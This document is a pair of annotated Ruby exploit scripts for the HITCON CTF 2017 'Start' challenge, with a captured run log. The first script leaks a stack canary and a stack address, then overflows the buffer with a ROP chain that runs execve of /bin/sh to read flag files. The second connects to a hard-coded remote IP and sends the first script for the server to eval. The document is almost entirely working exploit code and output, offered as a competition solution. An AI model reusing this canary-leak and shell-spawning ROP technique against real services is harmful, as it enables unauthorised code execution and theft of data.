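# HITCON CTF 2017 Quals "Start" — stage-1 script. It is not run locally: the
# companion exploit2.rb ships this file to the challenge host, which evidently
# evals it next to the vulnerable service on 127.0.0.1:31338 (the traceback
# recorded in exploit2.rb ends in `server.rb:15:in 'eval'`).
#
# Defender's reading of the two leaks below: the service echoes back more bytes
# than it received, so a short write followed by a read discloses the stack
# canary and a saved stack pointer; the final over-long write then overwrites
# the saved return address. The canary leak is what defeats stack protection,
# the stack leak is what lets the chain address its own argv strings, and the
# hard-coded gadget addresses mean the chain assumes the binary's code sits at
# a fixed load address (presumably not PIE; not verifiable from this script).
require 'pwn'

z = Sock.new '127.0.0.1', 31338

# Leak 1: 0x19 bytes in, skip the 0x18 echoed back, read the 8-byte canary.
# The extra input byte presumably overwrote the canary's low byte (glibc
# canaries have a zero low byte), so mask it back to 0x00 before reuse.
z.send 'A' * 0x19
z.recv 0x18
canary = u64(z.recv 8) & (~0xff)
log.info "canary: #{canary.hex}"
z.recv

# Leak 2: 0x40 bytes in, skip the 0x40 echoed back, read 6 bytes of a saved
# stack pointer. Pad to 8 bytes with two real NUL bytes: the original's
# single-quoted '\x00\x00' was eight literal characters (backslash, x, 0, 0,
# twice) and only worked because the 48-bit mask discarded the junk high bytes.
# The mask stays so the value is well-formed whatever recv hands back.
z.send 'A' * 0x40
z.recv 0x40
stack = u64((z.recv 6) + "\x00\x00") & 0x00ffffffffffff
log.info "stack: #{stack.hex}"
z.recv

# ROP gadgets: absolute addresses inside the target binary.
pop_rax_rdx_rbx_ret = 0x0047a6e6
pop_rdi_ret = 0x004005d5
pop_rsi_ret = 0x004017f7
syscall = 0x004003fc

# Stage 3: the overflow. Layout by offset within this payload:
#   0x00 filler; 0x18 canary (must match or the process aborts); 0x20 saved rbp;
#   0x28 return address -> chain: rax = 59 (execve), rdx = 0 (envp = NULL),
#        rbx = 0 (unused), rdi = &"/bin/sh", rsi = &argv, syscall;
#   0x70 argv = [&"/bin/sh", &"-c", &"cat /home/*/flag*", NULL]; 0x90 strings.
# The &-addresses are formed from the leaked stack pointer: by this layout
# stack - 0x100 + 0x38 lands on "/bin/sh" and stack - 0x100 + 0x18 on argv,
# i.e. the leaked value is taken to be 0x158 bytes above the buffer start —
# an assumption about the target's frame, not something this script checks.
payload = ''
payload += 'A' * 0x18
payload += p64 canary
payload += 'A' * 8
payload += p64 pop_rax_rdx_rbx_ret
payload += p64 59
payload += p64 0
payload += p64 0
payload += p64 pop_rdi_ret
payload += p64 (stack - 0x100 + 0x38)
payload += p64 pop_rsi_ret
payload += p64 (stack - 0x100 + 0x18)
payload += p64 syscall
payload += p64 (stack - 0x100 + 0x38)
payload += p64 (stack - 0x100 + 0x40)
payload += p64 (stack - 0x100 + 0x48)
payload += p64 0
payload += '/bin/sh'.ljust(8, "\x00")
payload += '-c'.ljust(8, "\x00")
payload += 'cat /home/*/flag*'
z.write payload
z.recv
# 'exit' presumably makes the handler return, which is when the chain runs.
z.sendline 'exit'

# Relay whatever the spawned command prints. The remote side eventually closes
# the socket and pwntools-ruby reports that as EOFError (see the log kept in
# exploit2.rb), so end the read loop cleanly instead of dying inside it.
begin
  loop { puts z.recv }
rescue EOFError
  log.info 'connection closed'
end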
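# HITCON CTF 2017 Quals: Start
#
# Stage-2 driver. The challenge host reads a Ruby script from the client and
# evidently evals it with pwntools-ruby loaded (`server.rb:15:in 'eval'` and
# the `(eval):NN` frames in the log below), so the whole of ./exploit.rb is
# sent as-is and its output relayed. From a defender's point of view that eval
# of client-supplied code is the intended sandbox boundary of this challenge;
# the memory-corruption part lives entirely in exploit.rb.
require 'pwn'

z = Sock.new '54.65.72.116', 31337
z.recvuntil '> '
z.write File.read('./exploit.rb')

# Relay output until the remote side closes the socket. pwntools-ruby surfaces
# that close as EOFError (both tracebacks below end in it), so treat it as the
# normal end of the session rather than crashing out of the loop.
begin
  loop { puts z.recv }
rescue EOFError
  log.info 'connection closed'
end

# $ bundle exec ruby exploit2.rb
# [INFO] canary: 0xd1b454730f989000
# [INFO] stack: 0x7ffed8f31988
#
# hitcon{thanks_for_using_pwntools-ruby:D}
# server.rb:15:in `eval': EOFError (EOFError)
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/sock.rb:84:in `recv_raw'
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer'
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/timer.rb:54:in `countdown'
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer'
# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:38:in `recv'
# from (eval):42:in `block in <main>'
# from (eval):41:in `loop'
# from (eval):41:in `<main>'
# from server.rb:15:in `eval'
# from server.rb:15:in `<main>'
# /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:90:in `rescue in recv_raw': EOFError (EOFError)
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:84:in `recv_raw'
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer'
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/timer.rb:54:in `countdown'
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer'
# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:38:in `recv'
# from exploit2.rb:10:in `block in <main>'
# from exploit2.rb:9:in `loop'
# from exploit2.rb:9:in `<main>'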